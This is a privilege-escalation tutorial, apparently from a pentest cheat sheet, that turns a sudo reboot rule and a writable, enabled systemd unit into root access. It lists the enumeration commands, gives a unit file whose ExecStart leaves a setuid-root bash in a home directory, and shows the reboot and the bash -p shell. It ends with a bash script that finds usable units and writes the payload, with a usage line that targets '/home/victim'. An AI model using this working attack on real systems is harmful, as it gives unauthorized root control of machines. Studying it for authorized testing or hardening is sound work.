Sudo Reboot Privilege Escalation
A sudo rule that lets us run the reboot command as root can be abused for privilege escalation (PrivEsc) when we can also write to a systemd unit file that runs at boot. Check the rule with sudo -l:
sudo -l
(ALL) NOPASSWD: /usr/sbin/reboot
Rebooting alone does not give us anything, but it causes systemd to start every enabled unit as root. So the next step is to look for systemd unit files that our user can write to:
find / -writable -name "*.service" 2>/dev/null
/etc/systemd/system/example.service
If we find a writable unit, we can replace the ExecStart= line in its [Service] section with a payload. The unit must actually be started at boot for this to work: check with systemctl is-enabled example.service, or look for a symlink to it under /etc/systemd/system/*.wants/, because a unit file that merely exists but is not enabled (or pulled in by another unit) is never executed. The payload below copies bash into our home directory and sets the setuid bit on the copy, which is owned by root because the service runs as root:
# /etc/systemd/system/example.service
[Unit]
Description=Zeno monitoring

[Service]
Type=simple
# Runs as root, so the copied bash is root-owned and chmod +s makes it setuid root
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /home/<username>/bash; chmod +xs /home/<username>/bash'

[Install]
# Started at boot only if the unit is enabled (symlinked into multi-user.target.wants/)
WantedBy=multi-user.target
Now reboot as root. This takes the whole machine down for everyone, so make sure that is acceptable for the engagement before doing it.
sudo /usr/sbin/reboot
After the system has rebooted, systemd runs the ExecStart command as root, leaving a root-owned, setuid copy of bash in our home directory. Running it with -p keeps the effective UID of root instead of letting bash drop back to our real UID; id should then report euid=0(root). This only works if the filesystem holding the copy is not mounted with nosuid, so pick another root-writable location if /home is.
/home/<username>/bash -p
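The steps above, automated as an added example that is not part of the original page: a bash script that lists writable *.service files under a unit directory, checks whether each one is actually pulled in at boot by a *.wants/ or *.requires/ symlink (the same condition the manual systemctl is-enabled check covers), and writes the ExecStart payload into a chosen unit. The function names, the unit-root argument (defaulting to /etc/systemd/system) and the /home/victim destination used in the usage line are assumptions of this example.

```shell
#!/usr/bin/env bash
# Added example, not from the original page. Audits systemd unit files for the
# sudo-reboot PrivEsc: a unit is only useful if it is writable by us AND is
# started at boot. Defaults to /etc/systemd/system; pass another root to test.

# Print every *.service file under $1 that the current user can write to.
find_writable_units() {
    local root="${1:-/etc/systemd/system}" f
    find "$root" -type f -name '*.service' 2>/dev/null | while IFS= read -r f; do
        if [ -w "$f" ]; then
            printf '%s\n' "$f"
        fi
    done
    return 0
}

# Return 0 if a *.wants/ or *.requires/ directory under $1 contains an entry
# named $2 (how systemctl enable wires a unit into a target), else 1.
unit_is_pulled_in() {
    local root="$1" unit="$2"
    [ -n "$(find "$root" \( -path '*.wants/*' -o -path '*.requires/*' \) \
                 -name "$unit" 2>/dev/null)" ]
}

# Overwrite unit $1 so that a root-owned setuid copy of bash is dropped into
# directory $2 at boot. $2 must be writable by root and not mounted nosuid.
write_payload_unit() {
    local unit="$1" dest="$2"
    cat > "$unit" <<EOF
[Unit]
Description=Zeno monitoring

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash ${dest}/bash; chmod +xs ${dest}/bash'

[Install]
WantedBy=multi-user.target
EOF
}

# Report each writable unit and whether rebooting would actually run it.
audit_units() {
    local root="${1:-/etc/systemd/system}" f name
    find_writable_units "$root" | while IFS= read -r f; do
        name=$(basename "$f")
        if unit_is_pulled_in "$root" "$name"; then
            printf '%s: writable and pulled in at boot -> usable\n' "$f"
        else
            printf '%s: writable but not enabled -> ExecStart will not run on reboot\n' "$f"
        fi
    done
    return 0
}

# Usage: bash audit.sh [unit-root]
#   then: write_payload_unit /etc/systemd/system/example.service /home/victim
#         sudo /usr/sbin/reboot ; /home/victim/bash -p
if [ "$#" -gt 0 ]; then
    audit_units "$1"
fi
```

The audit deliberately only inspects the directory tree, so it works from a low-privilege shell on a live target without touching systemd; on a real box also run systemctl is-enabled on each candidate, since a unit can be pulled in from /usr/lib/systemd/system or by a Wants= line in another unit that this script does not parse.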